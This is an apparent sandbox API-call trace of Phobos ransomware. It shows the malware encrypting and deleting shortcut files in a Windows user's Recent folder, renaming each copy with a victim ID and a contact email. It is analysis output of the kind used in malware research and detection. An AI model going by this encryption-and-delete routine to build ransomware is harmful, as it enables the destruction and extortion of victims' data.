1 [0201.574] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\V7ey.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\v7ey.lnk")) returned 0x20 [0201.574] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\V7ey.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\v7ey.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\V7ey.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\v7ey.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.575] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.575] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.575] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\V7ey.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\v7ey.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.575] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.576] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.576] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xd95, lpOverlapped=0x0) returned 1 [0201.577] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xda0, dwBufLen=0xda0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xda0) returned 1 [0201.577] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xda0, lpOverlapped=0x0) returned 1 [0201.578] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0201.578] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.578] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0201.578] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.578] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0201.578] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.578] CloseHandle (hObject=0x178) returned 1 [0201.578] CloseHandle (hObject=0x124) returned 1 [0201.578] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\V7ey.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\v7ey.lnk")) returned 1 [0201.579] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vCSx2uj4.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vcsx2uj4.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.580] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=728) returned 1 [0201.580] CloseHandle (hObject=0x124) returned 1 [0201.580] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vCSx2uj4.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vcsx2uj4.lnk")) returned 0x20 [0201.580] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vCSx2uj4.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vcsx2uj4.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.580] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vCSx2uj4.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vcsx2uj4.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.580] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.580] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.580] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vCSx2uj4.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vcsx2uj4.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.581] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.581] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.581] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x2d8, lpOverlapped=0x0) returned 1 [0201.633] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2e0, dwBufLen=0x2e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2e0) returned 1 [0201.633] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x2e0, lpOverlapped=0x0) returned 1 [0201.702] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.702] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.702] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0201.702] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.702] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0201.702] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.702] CloseHandle (hObject=0x124) returned 1 [0201.702] CloseHandle (hObject=0x178) returned 1 [0201.702] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vCSx2uj4.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vcsx2uj4.lnk")) returned 1 [0201.703] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.703] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yMVikYj-9s01azpDh.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ymvikyj-9s01azpdh.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.704] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=5507) returned 1 [0201.704] CloseHandle (hObject=0x178) returned 1 [0201.704] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yMVikYj-9s01azpDh.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ymvikyj-9s01azpdh.lnk")) returned 0x20 [0201.704] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yMVikYj-9s01azpDh.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ymvikyj-9s01azpdh.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yMVikYj-9s01azpDh.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ymvikyj-9s01azpdh.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.704] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.704] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yMVikYj-9s01azpDh.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ymvikyj-9s01azpdh.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.705] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.705] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.705] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1583, lpOverlapped=0x0) returned 1 [0201.707] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1590, dwBufLen=0x1590 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1590) returned 1 [0201.707] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1590, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1590, lpOverlapped=0x0) returned 1 [0201.708] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.708] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.708] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0201.708] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.708] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0201.708] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.708] CloseHandle (hObject=0x178) returned 1 [0201.708] CloseHandle (hObject=0x124) returned 1 [0201.708] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yMVikYj-9s01azpDh.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ymvikyj-9s01azpdh.lnk")) returned 1 [0201.709] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.709] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yShn5.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\yshn5.mkv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.710] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2461) returned 1 [0201.710] CloseHandle (hObject=0x124) returned 1 [0201.710] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yShn5.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\yshn5.mkv.lnk")) returned 0x20 [0201.710] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yShn5.mkv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\yshn5.mkv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yShn5.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\yshn5.mkv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.710] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.710] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yShn5.mkv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\yshn5.mkv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.711] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.711] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.711] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x99d, lpOverlapped=0x0) returned 1 [0201.712] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x9a0, dwBufLen=0x9a0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x9a0) returned 1 [0201.712] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x9a0, lpOverlapped=0x0) returned 1 [0201.713] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.713] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.713] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0201.713] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.713] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0201.713] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.713] CloseHandle (hObject=0x124) returned 1 [0201.713] CloseHandle (hObject=0x178) returned 1 [0201.713] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yShn5.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\yshn5.mkv.lnk")) returned 1 [0201.714] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.714] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YWgQdDMFg.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ywgqddmfg.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.715] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3706) returned 1 [0201.715] CloseHandle (hObject=0x178) returned 1 [0201.715] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YWgQdDMFg.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ywgqddmfg.lnk")) returned 0x20 [0201.715] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YWgQdDMFg.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ywgqddmfg.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YWgQdDMFg.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ywgqddmfg.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.715] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.715] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YWgQdDMFg.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ywgqddmfg.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.716] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.716] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.716] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xe7a, lpOverlapped=0x0) returned 1 [0201.717] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe80, dwBufLen=0xe80 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe80) returned 1 [0201.717] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe80, lpOverlapped=0x0) returned 1 [0201.718] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.718] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.718] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0201.718] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.718] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0201.718] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.718] CloseHandle (hObject=0x178) returned 1 [0201.718] CloseHandle (hObject=0x124) returned 1 [0201.718] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YWgQdDMFg.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ywgqddmfg.lnk")) returned 1 [0201.719] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ywUAB7tw1kCil NHujS7.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ywuab7tw1kcil nhujs7.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.720] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=5338) returned 1 [0201.720] CloseHandle (hObject=0x124) returned 1 